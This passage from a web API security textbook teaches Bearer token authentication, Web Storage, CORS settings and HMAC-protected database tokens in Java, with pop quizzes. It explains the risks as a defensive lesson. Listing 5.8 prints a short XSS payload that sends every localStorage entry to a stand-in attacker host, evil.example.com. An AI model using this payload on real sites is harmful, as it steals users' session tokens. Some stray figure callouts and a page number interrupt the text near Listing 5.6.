include a realm parameter, just like any other HTTP authentication scheme, if the
API requires different tokens for different endpoints. For example, you might return
realm="users" from one endpoint and realm="admins" from another, to indicate to
the client that they should obtain a token from a different login endpoint for adminis-
trators compared to regular users. Finally, you can also return a standard error code and
description to tell the client why the request was rejected. Of the three error codes defined in the specification, the only one you need to worry about now is invalid_token, which indicates that the token passed in the request was expired or otherwise invalid. For example, if a client passed a token that has expired, you could return:
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer realm="users", error="invalid_token",
error_description="Token has expired"
This lets the client know to reauthenticate to get a new token and then try its request
again. Open the TokenController.java file in your editor and update the validateToken and logout methods to extract the token from the Authorization header. If the
value starts with the string "Bearer" followed by a single space, then you can extract
the token ID from the rest of the value. Otherwise you should ignore it, to allow
HTTP Basic authentication to still work at the login endpoint. You can also return a
useful WWW-Authenticate header if the token has expired. Listing 5.4 shows the updated methods. Update the implementation and save the file.

Listing 5.4 Parsing Bearer Authorization headers
public void validateToken(Request request, Response response) {
    // Check that the Authorization header is present and uses the Bearer scheme.
    var tokenId = request.headers("Authorization");
    if (tokenId == null || !tokenId.startsWith("Bearer ")) {
        return;
    }
    // The token ID is the rest of the header value.
    tokenId = tokenId.substring(7);
    tokenStore.read(request, tokenId).ifPresent(token -> {
        if (Instant.now().isBefore(token.expiry)) {
            request.attribute("subject", token.username);
            token.attributes.forEach(request::attribute);
        } else {
            // If the token is expired, then tell the client using a standard response.
            response.header("WWW-Authenticate",
                "Bearer error=\"invalid_token\"," +
                "error_description=\"Expired\"");
            halt(401);
        }
    });
}

public JSONObject logout(Request request, Response response) {
    var tokenId = request.headers("Authorization");
    if (tokenId == null || !tokenId.startsWith("Bearer ")) {
        throw new IllegalArgumentException("missing token header");
    }
    tokenId = tokenId.substring(7);

    tokenStore.revoke(request, tokenId);
    response.status(200);
    return new JSONObject();
}
You can also add the WWW-Authenticate header challenge when no valid credentials are present on a request at all. Open the UserController.java file and update the requireAuthentication filter to match listing 5.5.

Listing 5.5 Prompting for Bearer authentication
public void requireAuthentication(Request request, Response response) {
    // Prompt for Bearer authentication if no credentials are present.
    if (request.attribute("subject") == null) {
        response.header("WWW-Authenticate", "Bearer");
        halt(401);
    }
}
5.2.3 Deleting expired tokens
The new token-based authentication method is working well for your mobile and
desktop apps, but your database administrators are worried that the tokens table
keeps growing larger without any tokens ever being removed. This also creates a
potential DoS attack vector, because an attacker could keep logging in to generate
enough tokens to fill the database storage. You should implement a periodic task to
delete expired tokens to prevent the database growing too large. This is a one-line task in SQL, as shown in listing 5.6. Open DatabaseTokenStore.java and add the method in the listing to implement expired token deletion.

Listing 5.6 Deleting expired tokens
Listing 5.5
Prompting for Bearer authentication
If the token is expired,
then tell the client using
a standard response.
Check that the
Authorization
header is present
and uses the
Bearer scheme.
The token ID is the rest
of the header value.
Prompt for Bearer authentication
if no credentials are present.
163
Tokens without cookies
public void deleteExpiredTokens() {
    // Delete all tokens with an expiry time in the past.
    database.update(
        "DELETE FROM tokens WHERE expiry < current_timestamp");
}
To make this efficient, you should index the expiry column on the database, so that it
does not need to loop through every single token to find the ones that have expired.
Open schema.sql and add the following line to the bottom to create the index:
CREATE INDEX expired_token_idx ON tokens(expiry);
Finally, you need to schedule a periodic task to call the method to delete the expired
tokens. There are many ways you could do this in production. Some frameworks
include a scheduler for these kinds of tasks, or you could expose the method as a
REST endpoint and call it periodically from an external job. If you do this, remember
to apply rate-limiting to that endpoint or require authentication (or a special permis-
sion) before it can be called, as in the following example:
before("/expired_tokens", userController::requireAuthentication);
delete("/expired_tokens", (request, response) -> {
    databaseTokenStore.deleteExpiredTokens();
    return new JSONObject();
});
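With that route in place, an external job scheduler such as cron could trigger the cleanup with a simple authenticated request, along these lines (illustrative only; the endpoint name comes from the example above and the credentials are the test user's):

$ curl -u test:password -X DELETE https://localhost:4567/expired_tokens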
For now, you can use a simple Java scheduled executor service to periodically call
the method. Open DatabaseTokenStore.java again, and add the following lines to the
constructor:
// Schedule deleteExpiredTokens to run every 10 minutes
// (requires java.util.concurrent imports for Executors and TimeUnit).
Executors.newSingleThreadScheduledExecutor()
    .scheduleAtFixedRate(this::deleteExpiredTokens,
        10, 10, TimeUnit.MINUTES);
This will cause the method to be executed every 10 minutes, after an initial 10-minute
delay. If a cleanup job takes more than 10 minutes to run, then the next run will be
scheduled immediately after it completes.
5.2.4 Storing tokens in Web Storage
Now that you’ve got tokens working without cookies, you can update the Natter UI to
send the token in the Authorization header instead of in the X-CSRF-Token header.
Open natter.js in your editor and update the createSpace function to pass the token
in the correct header. You can also remove the credentials field, because you no lon-
ger need the browser to send cookies in the request:
fetch(apiUrl + '/spaces', {
    method: 'POST',
    body: JSON.stringify(data),
    // The credentials field has been removed to stop the browser sending cookies.
    headers: {
        'Content-Type': 'application/json',
        // Pass the token in the Authorization header using the Bearer scheme.
        'Authorization': 'Bearer ' + csrfToken
    }
})
Of course, you can also rename the csrfToken variable to just token now if you like.
Save the file and restart the API and the duplicate UI on port 9999. Both copies of the
UI will now work fine with no session cookie. Of course, there is still one cookie left to
hold the token between the login page and the natter page, but you can get rid of that
now too.
Until the release of HTML 5, there were very few alternatives to cookies for storing tokens in a web browser client. Now there are two widely-supported alternatives:
- The Web Storage API that includes the localStorage and sessionStorage objects for storing simple key-value pairs.
- The IndexedDB API that allows storing larger amounts of data in a more sophisticated JSON NoSQL database.
Both APIs provide significantly greater storage capacity than cookies, which are typi-
cally limited to just 4KB of storage for all cookies for a single domain. However,
because session tokens are relatively small, you can stick to the simpler Web Storage
API in this chapter. While IndexedDB has even larger storage limits than Web Storage,
it typically requires explicit user consent before it can be used. By replacing cookies
for storage on the client, you will now have a replacement for all three aspects of
token-based authentication provided by cookies, as shown in figure 5.4:
- On the backend, you can manually store token state in a database to replace the cookie storage provided by most web frameworks.
- You can use the Bearer authentication scheme as a standard way to communicate tokens from the client to the API, and to prompt for tokens when not supplied.
- Cookies can be replaced on the client by the Web Storage API.

Figure 5.4 Cookies can be replaced by Web Storage for storing tokens on the client. The Bearer authentication scheme provides a standard way to communicate tokens from the client to the API, and a token store can be manually implemented on the backend.
Web Storage is simple to use, especially when compared with how hard it was to
extract a cookie in JavaScript. Browsers that support the Web Storage API, which
includes most browsers in current use, add two new fields to the standard JavaScript
window object:
- The sessionStorage object can be used to store data until the browser window or tab is closed.
- The localStorage object stores data until it is explicitly deleted, saving the data even over browser restarts.
Although similar to session cookies, sessionStorage is not shared between browser
tabs or windows; each tab gets its own storage. Although this can be useful, if you use
sessionStorage to store authentication tokens then the user will be forced to login
again every time they open a new tab and logging out of one tab will not log them out
of the others. For this reason, it is more convenient to store tokens in localStorage
instead.
Each object implements the same Storage interface that defines setItem(key,
value), getItem(key), and removeItem(key) methods to manipulate key-value pairs
in that storage. Each storage object is implicitly scoped to the origin of the script that
calls the API, so a script from example.com will see a completely different copy of the
storage to a script from example.org.
TIP
If you want scripts from two sibling sub-domains to share storage, you
can set the document.domain field to a common parent domain in both
scripts. Both scripts must explicitly set the document.domain, otherwise it will
be ignored. For example, if a script from a.example.com and a script from
b.example.com both set document.domain to example.com, then they will
share Web Storage. This is allowed only for a valid parent domain of the script
origin, and you cannot set it to a top-level domain like .com or .org. Setting
the document.domain field also instructs the browser to ignore the port when
comparing origins.
To update the login UI to set the token in local storage rather than a cookie, open
login.js in your editor and locate the line that currently sets the cookie:
document.cookie = 'token=' + json.token +
';Secure;SameSite=strict';
Remove that line and replace it with the following line to set the token in local storage
instead:
localStorage.setItem('token', json.token);
Now open natter.js and find the line that reads the token from a cookie. Delete that
line and the getCookie function, and replace it with the following:
let token = localStorage.getItem('token');
That is all it takes to use the Web Storage API. If the token expires, then the API will
return a 401 response, which will cause the UI to redirect to the login page. Once the
user has logged in again, the token in local storage will be overwritten with the new
version, so you do not need to do anything else. Restart the UI and check that every-
thing is working as expected.
5.2.5 Updating the CORS filter
Now that your API no longer needs cookies to function, you can tighten up the CORS settings. Though you are explicitly sending credentials on each request, the browser no longer has to add any of its own credentials (cookies), so you can remove the Access-Control-Allow-Credentials headers to stop the browser sending any. If you wanted, you could now also set the allowed origins header to * to allow requests from any origin, but it is best to keep it locked down unless you really want the API to be open to all comers. You can also remove X-CSRF-Token from the allowed headers list. Open CorsFilter.java in your editor and update the handle method to remove these extra headers, as shown in listing 5.7.

Listing 5.7 Updated CORS filter
@Override
public void handle(Request request, Response response) {
    var origin = request.headers("Origin");
    if (origin != null && allowedOrigins.contains(origin)) {
        response.header("Access-Control-Allow-Origin", origin);
        // The Access-Control-Allow-Credentials header has been removed.
        response.header("Vary", "Origin");
    }

    if (isPreflightRequest(request)) {
        if (origin == null || !allowedOrigins.contains(origin)) {
            halt(403);
        }
        // X-CSRF-Token has been removed from the allowed headers.
        response.header("Access-Control-Allow-Headers",
            "Content-Type, Authorization");
        response.header("Access-Control-Allow-Methods",
            "GET, POST, DELETE");
        halt(204);
    }
}
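The isPreflightRequest helper is the one written back in chapter 4 when CORS support was first added. If you no longer have it, the following sketch captures the logic (assuming Spark's Request API; a preflight is an OPTIONS request carrying the Access-Control-Request-Method header):

private boolean isPreflightRequest(Request request) {
    // A CORS preflight is an OPTIONS request asking permission
    // to use a particular method and set of headers.
    return "OPTIONS".equals(request.requestMethod()) &&
        request.headers().contains("Access-Control-Request-Method");
}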
Because the API is no longer allowing clients to send cookies on requests, you must
also update the login UI to not enable credentials mode on its fetch request. If you
remember from earlier, you had to enable this so that the browser respected the Set-
Cookie header on the response. If you leave this mode enabled but with credentials
mode rejected by CORS, then the browser will completely block the request and you
will no longer be able to login. Open login.js in your editor and remove the line that
requests credentials mode for the request:
credentials: 'include',
Restart the API and UI again and check that everything is still working. If it does not
work, you may need to clear your browser cache to pick up the latest version of the
login.js script. Starting a fresh Incognito/Private Browsing page is the simplest way to
do this.3
5.2.6 XSS attacks on Web Storage
Storing tokens in Web Storage is much easier to manage from JavaScript, and it elimi-
nates the CSRF attacks that impact session cookies, because the browser is no longer
automatically adding tokens to requests for us. But while the session cookie could be
marked as HttpOnly to prevent it being accessible from JavaScript, Web Storage
objects are only accessible from JavaScript and so the same protection is not available.
This can make Web Storage more susceptible to XSS exfiltration attacks, although Web
Storage is only accessible to scripts running from the same origin while cookies are
available to scripts from the same domain or any sub-domain by default.
DEFINITION
Exfiltration is the act of stealing tokens and sensitive data from a
page and sending them to the attacker without the victim being aware. The
attacker can then use the stolen tokens to log in as the user from the attacker’s
own device.
If an attacker can exploit an XSS attack (chapter 2) against a browser-based client of your API, then they can easily loop through the contents of Web Storage and create an img tag for each item with the src attribute pointing to an attacker-controlled website to extract the contents, as illustrated in figure 5.5.

Figure 5.5 An attacker can exploit an XSS vulnerability to steal tokens from Web Storage. By creating image elements, the attacker can exfiltrate the tokens without any visible indication to the user.
Most browsers will eagerly load an image source URL, without the img even being
added to the page,4 allowing the attacker to steal tokens covertly with no visible indica-
tion to the user. Listing 5.8 shows an example of this kind of attack, and how little code is required to carry it out.

3 Some older versions of Safari would disable local storage in private browsing mode, but this has been fixed since version 12.
4 I first learned about this technique from Jim Manico, founder of Manicode Security (https://manicode.com).

Listing 5.8 Covert exfiltration of Web Storage
// Loop through every element in localStorage.
for (var i = 0; i < localStorage.length; ++i) {
    var key = localStorage.key(i);

    // Construct an img element with the src attribute
    // pointing to an attacker-controlled site.
    var img = document.createElement('img');

    // Encode the key and value into the src URL to send them to the attacker.
    img.setAttribute('src',
        'https://evil.example.com/exfil?key=' +
        encodeURIComponent(key) + '&value=' +
        encodeURIComponent(localStorage.getItem(key)));
}
Although using HttpOnly cookies can protect against this attack, XSS attacks under-
mine the security of all forms of web browser authentication technologies. If the
attacker cannot extract the token and exfiltrate it to their own device, they will instead
use the XSS exploit to execute the requests they want to perform directly from within
the victim’s browser as shown in figure 5.6. Such requests will appear to the API to
come from the legitimate UI, and so would also defeat any CSRF defenses. While
more complex, these kinds of attacks are now commonplace using frameworks such as
the Browser Exploitation Framework (https://beefproject.com), which allow sophisti-
cated remote control of a victim's browser through an XSS attack.

Figure 5.6 An XSS exploit can be used to proxy requests from the attacker through the user's browser to the API of the victim. Because the XSS script appears to be from the same origin as the API, the browser will include all cookies and the script can do anything.
NOTE
There is no reasonable defense if an attacker can exploit XSS, so elim-
inating XSS vulnerabilities from your UI must always be your priority. See
chapter 2 for advice on preventing XSS attacks.
Chapter 2 covered general defenses against XSS attacks in a REST API. Although a more detailed discussion of XSS is out of scope for this book (because it is primarily an attack against a web UI rather than an API), two technologies are worth mentioning because they provide significant hardening against XSS:
- The Content-Security-Policy header (CSP), mentioned briefly in chapter 2, provides fine-grained control over which scripts and other resources can be loaded by a page and what they are allowed to do. Mozilla Developer Network has a good introduction to CSP at https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP. (An example policy follows this list.)
- An experimental proposal from Google called Trusted Types aims to completely eliminate DOM-based XSS attacks. DOM-based XSS occurs when trusted JavaScript code accidentally allows user-supplied HTML to be injected into the DOM, such as when assigning user input to the .innerHTML attribute of an existing element. DOM-based XSS is notoriously difficult to prevent as there are many ways that this can occur, not all of which are obvious from inspection. The Trusted Types proposal allows policies to be installed that prevent arbitrary strings from being assigned to these vulnerable attributes. See https://developers.google.com/web/updates/2019/02/trusted-types for more information.
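To give a flavor of CSP, a locked-down policy for a single-page app UI might look something like the following. This is an illustrative sketch only (the API origin is the placeholder used earlier in the chapter), not a recommendation for your application:

Content-Security-Policy: default-src 'none'; script-src 'self';
    connect-src 'self' https://api.example.net

This denies everything by default, allows scripts to load only from the app's own origin, and permits fetch and XHR connections only to the app's origin and the API.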
Pop quiz

2. Which one of the following is a secure way to generate a random token ID?
   a. Base64-encoding the user's name plus a counter.
   b. Hex-encoding the output of new Random().nextLong().
   c. Base64-encoding 20 bytes of output from a SecureRandom.
   d. Hashing the current time in microseconds with a secure hash function.
   e. Hashing the current time together with the user's password with SHA-256.

3. Which standard HTTP authentication scheme is designed for token-based authentication?
   a. NTLM
   b. HOBA
   c. Basic
   d. Bearer
   e. Digest

The answers are at the end of the chapter.
5.3 Hardening database token storage
Suppose that an attacker gains access to your token database, either through direct
access to the server or by exploiting a SQL injection attack as described in chapter 2.
They can not only view any sensitive data stored with the tokens, but also use those
tokens to access your API. Because the database contains tokens for every authenti-
cated user, the impact of such a compromise is much more severe than compromising
a single user’s token. As a first step, you should separate the database server from the
API and ensure that the database is not directly accessible by external clients. Commu-
nication between the database and the API should be secured with TLS. Even if you
do this, there are still many potential threats against the database, as shown in figure 5.7.

Figure 5.7 A database token store is subject to several threats, even if you secure the communications between the API and the database using TLS. An attacker may gain direct access to the database or via an injection attack. Read access allows the attacker to steal tokens and gain access to the API as any user. Write access allows them to create fake tokens or alter their own token. If they gain delete access, then they can delete other users' tokens, denying them access.
If an attacker gains read access to the database, such as through a SQL injection
attack, they can steal tokens and use them to access the API. If they gain write access,
then they can insert new tokens granting themselves access or alter existing tokens to
increase their access. Finally, if they gain delete access then they can revoke other
users’ tokens, denying them access to the API.
5.3.1 Hashing database tokens
Authentication tokens are credentials that allow access to a user’s account, just like a
password. In chapter 3, you learned to hash passwords to protect them in case the
user database is ever compromised. You should do the same for authentication
tokens, for the same reason. If an attacker ever compromises the token database,
they can immediately use all the login tokens for any user that is currently logged in.
Unlike user passwords, authentication tokens have high entropy, so you don’t need to
use an expensive password hashing algorithm like Scrypt. Instead you can use a fast,
cryptographic hash function such as SHA-256 that you used for generating anti-CSRF
tokens in chapter 4.
Listing 5.9 shows how to add token hashing to the DatabaseTokenStore by reusing
the sha256() method you added to the CookieTokenStore in chapter 4. The token
ID given to the client is the original, un-hashed random string, but the value stored
in the database is the SHA-256 hash of that string. Because SHA-256 is a one-way
hash function, an attacker that gains access to the database won’t be able to reverse
the hash function to determine the real token IDs. To read or revoke the token, you
simply hash the value provided by the user and use that to look up the record in the
database.

Listing 5.9 Hashing database tokens
@Override
public String create(Request request, Token token) {
    var tokenId = randomId();
    var attrs = new JSONObject(token.attributes).toString();

    // Hash the provided token ID when storing or looking up in the database.
    database.updateUnique("INSERT INTO " +
        "tokens(token_id, user_id, expiry, attributes) " +
        "VALUES(?, ?, ?, ?)", hash(tokenId), token.username,
        token.expiry, attrs);
    return tokenId;
}

@Override
public Optional<Token> read(Request request, String tokenId) {
    return database.findOptional(this::readToken,
        "SELECT user_id, expiry, attributes " +
        "FROM tokens WHERE token_id = ?", hash(tokenId));
}

@Override
public void revoke(Request request, String tokenId) {
    database.update("DELETE FROM tokens WHERE token_id = ?",
        hash(tokenId));
}

// Reuse the SHA-256 method from the CookieTokenStore for the hash.
private String hash(String tokenId) {
    var hash = CookieTokenStore.sha256(tokenId);
    return Base64url.encode(hash);
}
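The sha256() method on CookieTokenStore was written in chapter 4. If you skipped that step, a minimal version looks like this sketch (using the standard java.security.MessageDigest API; your chapter 4 code may differ slightly):

static byte[] sha256(String tokenId) {
    try {
        // SHA-256 is a fast one-way hash; fine for high-entropy token IDs.
        var sha256 = MessageDigest.getInstance("SHA-256");
        return sha256.digest(tokenId.getBytes(StandardCharsets.UTF_8));
    } catch (NoSuchAlgorithmException e) {
        throw new IllegalStateException(e);
    }
}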
5.3.2 Authenticating tokens with HMAC
Although effective against token theft, simple hashing does not prevent an attacker
with write access from inserting a fake token that gives them access to another user’s
account. Most databases are also not designed to provide constant-time equality
comparisons, so database lookups can be vulnerable to timing attacks like those dis-
cussed in chapter 4. You can eliminate both issues by calculating a message authentica-
tion code (MAC), such as the standard hash-based MAC (HMAC). HMAC works like a
normal cryptographic hash function, but incorporates a secret key known only to
the API server.
DEFINITION
A message authentication code (MAC) is an algorithm for comput-
ing a short fixed-length authentication tag from a message and a secret key. A
user with the same secret key will be able to compute the same tag from the
same message, but any change in the message will result in a completely dif-
ferent tag. An attacker without access to the secret cannot compute a correct
tag for any message. HMAC (hash-based MAC) is a widely used secure MAC
based on a cryptographic hash function. For example, HMAC-SHA-256 is
HMAC using the SHA-256 hash function.
The output of the HMAC function is a short authentication tag that can be appended to the token as shown in figure 5.8. An attacker without access to the secret key can't calculate the correct tag for a token, and the tag will change if even a single bit of the token ID is altered, preventing them from tampering with a token or faking new ones.

Figure 5.8 A token can be protected against theft and forgery by computing a HMAC authentication tag using a secret key. The token returned from the database is passed to the HMAC-SHA256 function along with the secret key. The output authentication tag is encoded and appended to the database ID to return to the client. Only the original token ID is stored in the database, and an attacker without access to the secret key cannot calculate a valid authentication tag.

In this section, you'll authenticate the database tokens with the widely used HMAC-SHA256 algorithm. HMAC-SHA256 takes a 256-bit secret key and an input message and produces a 256-bit authentication tag. There are many wrong ways to construct a secure MAC from a hash function, so rather than trying to build your own solution
you should always use HMAC, which has been extensively studied by experts. For
more information about secure MAC algorithms, I recommend Serious Cryptography by
Jean-Philippe Aumasson (No Starch Press, 2017).
Rather than storing the authentication tag in the database alongside the token ID,
you’ll instead leave that as-is. Before you return the token ID to the client, you’ll com-
pute the HMAC tag and append it to the encoded token, as shown in figure 5.9. When
the client sends a request back to the API including the token, you can validate the
authentication tag. If it is valid, then the tag is stripped off and the original token ID
passed to the database token store. If the tag is invalid or missing, then the request
can be immediately rejected without any database lookups, preventing any timing
attacks. Because an attacker with access to the database cannot create a valid authenti-
cation tag, they can’t use any stolen tokens to access the API and they can’t create
their own tokens by inserting records into the database.

Figure 5.9 The database token ID is left untouched, but an HMAC authentication tag is computed and attached to the token ID returned to API clients. When a token is presented to the API, the authentication tag is first validated and then stripped from the token ID before passing it to the database token store. If the authentication tag is invalid, then the token is rejected before any database lookup occurs.
Listing 5.10 shows the code for computing the HMAC tag and appending it to the token. You can implement this as a new HmacTokenStore implementation that can be wrapped around the DatabaseTokenStore to add the protections, as HMAC turns out to be useful for other token stores, as you will see in the next chapter. The HMAC tag can be implemented using the javax.crypto.Mac class in Java, using a Key object passed to your constructor. You'll see soon how to generate the key. Create a new file HmacTokenStore.java alongside the existing DatabaseTokenStore.java and type in the contents of listing 5.10.

Listing 5.10 Computing a HMAC tag for a new token
package com.manning.apisecurityinaction.token;

import spark.Request;

import javax.crypto.Mac;
import java.nio.charset.StandardCharsets;
import java.security.*;
import java.util.*;

public class HmacTokenStore implements TokenStore {

    private final TokenStore delegate;
    private final Key macKey;

    // Pass in the real TokenStore implementation and the secret key to the constructor.
    public HmacTokenStore(TokenStore delegate, Key macKey) {
        this.delegate = delegate;
        this.macKey = macKey;
    }
    @Override
    public String create(Request request, Token token) {
        // Call the real TokenStore to generate the token ID, then use HMAC to calculate the tag.
        var tokenId = delegate.create(request, token);
        var tag = hmac(tokenId);

        // Concatenate the original token ID with the encoded tag as the new token ID.
        return tokenId + '.' + Base64url.encode(tag);
    }

    // Use the javax.crypto.Mac class to compute the HMAC-SHA256 tag.
    private byte[] hmac(String tokenId) {
        try {
            var mac = Mac.getInstance(macKey.getAlgorithm());
            mac.init(macKey);
            return mac.doFinal(
                tokenId.getBytes(StandardCharsets.UTF_8));
        } catch (GeneralSecurityException e) {
            throw new RuntimeException(e);
        }
    }

    @Override
    public Optional<Token> read(Request request, String tokenId) {
        return Optional.empty(); // To be written
    }
}
When the client presents the token back to the API, you extract the tag from the pre-
sented token and recompute the expected tag from the secret and the rest of the
token ID. If they match then the token is authentic, and you pass it through to the
DatabaseTokenStore. If they don’t match, then the request is rejected. Listing 5.11
shows the code to validate the tag. First you need to extract the tag from the token and
decode it. You then compute the correct tag just as you did when creating a fresh
token and check the two are equal.
WARNING
As you learned in chapter 4 when validating anti-CSRF tokens, it is
important to always use a constant-time equality when comparing a secret
value (the correct authentication tag) against a user-supplied value. Timing
attacks against HMAC tag validation are a common vulnerability, so it is criti-
cal that you use MessageDigest.isEqual or an equivalent constant-time
equality function.
Listing 5.11 Validating the HMAC tag

@Override
public Optional<Token> read(Request request, String tokenId) {
    // Extract the tag from the end of the token ID. If not found, then reject the request.
    var index = tokenId.lastIndexOf('.');
    if (index == -1) {
        return Optional.empty();
    }
    var realTokenId = tokenId.substring(0, index);
    // Decode the tag from the token and compute the correct tag.
    var provided = Base64url.decode(tokenId.substring(index + 1));
    var computed = hmac(realTokenId);

    // Compare the two tags with a constant-time equality check.
    if (!MessageDigest.isEqual(provided, computed)) {
        return Optional.empty();
    }

    // If the tag is valid, then call the real token store with the original token ID.
    return delegate.read(request, realTokenId);
}
GENERATING THE KEY
The key used for HMAC-SHA256 is just a 32-byte random value, so you could generate
one using a SecureRandom just like you currently do for database token IDs. But many
APIs will be implemented using more than one server to handle load from large num-
bers of clients, and requests from the same client may be routed to any server, so they
all need to use the same key. Otherwise, a token generated on one server will be
rejected as invalid by a different server with a different key. Even if you have only a sin-
gle server, if you ever restart it, then it will reject tokens issued before it restarted
unless the key is the same. To get around these problems, you can store the key in an
external keystore that can be loaded by each server.
DEFINITION
A keystore is an encrypted file that contains cryptographic keys
and TLS certificates used by your API. A keystore is usually protected by a
password.
Java supports loading keys from keystores using the java.security.KeyStore class,
and you can create a keystore using the keytool command shipped with the JDK. Java
provides several keystore formats, but you should use the PKCS #12 format (https://
tools.ietf.org/html/rfc7292) because that is the most secure option supported by
keytool.
Open a terminal window and navigate to the root folder of the Natter API project.
Then run the following command to generate a keystore with a 256-bit HMAC key:
# Generate a 256-bit key for HMAC-SHA256 and store it in a PKCS#12 keystore.
# The -storepass option sets a password for the keystore (ideally a better one than this!).
keytool -genseckey -keyalg HmacSHA256 -keysize 256 \
    -alias hmac-key -keystore keystore.p12 \
    -storetype PKCS12 \
    -storepass changeit
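If you would rather generate an equivalent key programmatically (in a test, for example), the JDK's KeyGenerator class can do it. This is a sketch of that alternative, not a step the book's setup requires, and you would still need to persist the key somewhere safe:

import javax.crypto.KeyGenerator;
import java.security.Key;
import java.security.NoSuchAlgorithmException;

static Key generateMacKey() throws NoSuchAlgorithmException {
    // Generate a fresh 256-bit key suitable for HMAC-SHA256.
    var keyGen = KeyGenerator.getInstance("HmacSHA256");
    keyGen.init(256);
    return keyGen.generateKey();
}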
You can then load the keystore in your main method and extract the key to pass to the HmacTokenStore. Rather than hard-code the keystore password in the source code, where it is accessible to anyone who can access the source code, you can pass it in from a system property or environment variable. This ensures that the developers writing the API do not know the password used for the production environment. The
password can then be used to unlock the keystore and to access the key itself.5 After you have loaded the key, you can then create the HmacTokenStore instance, as shown in listing 5.12. Open Main.java in your editor and find the lines that construct the DatabaseTokenStore and TokenController. Update them to match the listing.

5 Some keystore formats support setting different passwords for each key, but PKCS #12 uses a single password for the keystore and every key.

Listing 5.12 Loading the HMAC key
// Load the keystore password from a system property.
var keyPassword = System.getProperty("keystore.password",
        "changeit").toCharArray();

// Load the keystore, unlocking it with the password.
var keyStore = KeyStore.getInstance("PKCS12");
keyStore.load(new FileInputStream("keystore.p12"),
        keyPassword);

// Get the HMAC key from the keystore, using the password again.
var macKey = keyStore.getKey("hmac-key", keyPassword);

// Create the HmacTokenStore, passing in the DatabaseTokenStore and the HMAC key.
var databaseTokenStore = new DatabaseTokenStore(database);
var tokenStore = new HmacTokenStore(databaseTokenStore, macKey);
var tokenController = new TokenController(tokenStore);
TRYING IT OUT
Restart the API, adding -Dkeystore.password=changeit to the command-line arguments, and you can see the updated token format when you authenticate:
# Create a test user.
$ curl -H 'Content-Type: application/json' \
  -d '{"username":"test","password":"password"}' \
  https://localhost:4567/users
{"username":"test"}

# Log in to get a token with the HMAC tag.
$ curl -H 'Content-Type: application/json' -u test:password \
  -X POST https://localhost:4567/sessions
{"token":"OrosINwKcJs93WcujdzqGxK-d9s.wOaaXO4_yP4qtPmkOgphFob1HGB5X-bi0PNApBOa5nU"}
If you try and use the token without the authentication tag, then it is rejected with a
401 response. The same happens if you try to alter any part of the token ID or the tag
itself. Only the full token, with the tag, is accepted by the API.
5.3.3 Protecting sensitive attributes
Suppose that your tokens include sensitive information about users in token attri-
butes, such as their location when they logged in. You might want to use these attri-
butes to make access control decisions, such as disallowing access to confidential
documents if the token is suddenly used from a very different location. If an attacker
gains read access to the database, they would learn the location of every user currently
using the system, which would violate their expectation of privacy.
The main threat to your token database is through injection attacks or logic errors in
the API itself that allow a user to perform actions against the database that they should
not be allowed to perform. This might be reading other users’ tokens or altering or
deleting them. As discussed in chapter 2, use of prepared statements makes injection
attacks much less likely. You reduced the risk even further in that chapter by using a
database account with fewer permissions rather than the default administrator account.
You can take this approach further to reduce the ability of attackers to exploit weak-
nesses in your database storage, with two additional refinements:
- You can create separate database accounts to perform destructive operations such as bulk deletion of expired tokens and deny those privileges to the database user used for running queries in response to API requests. An attacker that exploits an injection attack against the API is then much more limited in the damage they can perform. This split of database privileges into separate accounts can work well with the Command-Query Responsibility Segregation (CQRS; see https://martinfowler.com/bliki/CQRS.html) API design pattern, in which a completely separate API is used for query operations compared to update operations.
Encrypting database attributes
One way to protect sensitive attributes in the database is by encrypting them. While
many databases come with built-in support for encryption, and some commercial
products can add this, these solutions typically only protect against attackers that
gain access to the raw database file storage. Data returned from queries is transpar-
ently decrypted by the database server, so this type of encryption does not protect
against SQL injection or other attacks that target the database API. You can solve
this by encrypting database records in your API before sending data to the database,
and then decrypting the responses read from the database. Database encryption is
a complex topic, especially if encrypted attributes need to be searchable, and could
fill a book by itself. The open source CipherSweet library (https://ciphersweet.paragonie.com) provides the nearest thing to a complete solution that I am aware of, but it lacks a Java version at present.
All searchable database encryption leaks some information about the encrypted val-
ues, and a patient attacker may eventually be able to defeat any such scheme. For
this reason, and the complexity, I recommend that developers concentrate on basic
database access controls before investigating more complex solutions. You should
still enable built-in database encryption if your database storage is hosted by a cloud
provider or other third party, and you should always encrypt all database backups—
many backup tools can do this for you.
For readers that want to learn more, I’ve provided a heavily-commented version of the
DatabaseTokenStore providing encryption and authentication of all token attributes,
as well as blind indexing of usernames in a branch of the GitHub repository that accom-
panies this book at http://mng.bz/4B75.
- Many databases support row-level security policies that allow queries and updates to see a filtered view of database tables based on contextual information supplied by the application. For example, you could configure a policy that restricts the tokens that can be viewed or updated to only those with a username attribute matching the current API user. This would prevent an attacker from exploiting an SQL vulnerability to view or modify any other user's tokens. The H2 database used in this book does not support row-level security policies. See https://www.postgresql.org/docs/current/ddl-rowsecurity.html for how to configure row-level security policies for PostgreSQL as an example.
Pop quiz

4. Where should you store the secret key used for protecting database tokens with HMAC?
   a. In the database alongside the tokens.
   b. In a keystore accessible only to your API servers.
   c. Printed out in a physical safe in your boss's office.
   d. Hard-coded into your API's source code on GitHub.
   e. It should be a memorable password that you type into each server.

5. Given the following code for computing a HMAC authentication tag:

   byte[] provided = Base64url.decode(authTag);
   byte[] computed = hmac(tokenId);

   which one of the following lines of code should be used to compare the two values?
   a. computed.equals(provided)
   b. provided.equals(computed)
   c. Arrays.equals(provided, computed)
   d. Objects.equals(provided, computed)
   e. MessageDigest.isEqual(provided, computed)

6. Which API design pattern can be useful to reduce the impact of SQL injection attacks?
   a. Microservices
   b. Model View Controller (MVC)
   c. Uniform Resource Identifiers (URIs)
   d. Command Query Responsibility Segregation (CQRS)
   e. Hypertext as the Engine of Application State (HATEOAS)

The answers are at the end of the chapter.
Answers to pop quiz questions

1. e. The Access-Control-Allow-Credentials header is required on both the preflight response and on the actual response; otherwise, the browser will reject the cookie or strip it from subsequent requests.
2. c. Use a SecureRandom or other cryptographically-secure random number generator. Remember that while the output of a hash function may look random, it's only as unpredictable as the input that is fed into it.
3. d. The Bearer auth scheme is used for tokens.
4. b. Store keys in a keystore or other secure storage (see part 4 of this book for other options). Keys should not be stored in the same database as the data they are protecting and should never be hard-coded. A password is not a suitable key for HMAC.
5. e. Always use MessageDigest.isEqual or another constant-time equality test to compare HMAC tags.
6. d. CQRS allows you to use different database users for queries versus database updates with only the minimum privileges needed for each task. As described in section 5.3.3, this can reduce the damage that an SQL injection attack can cause.
Summary
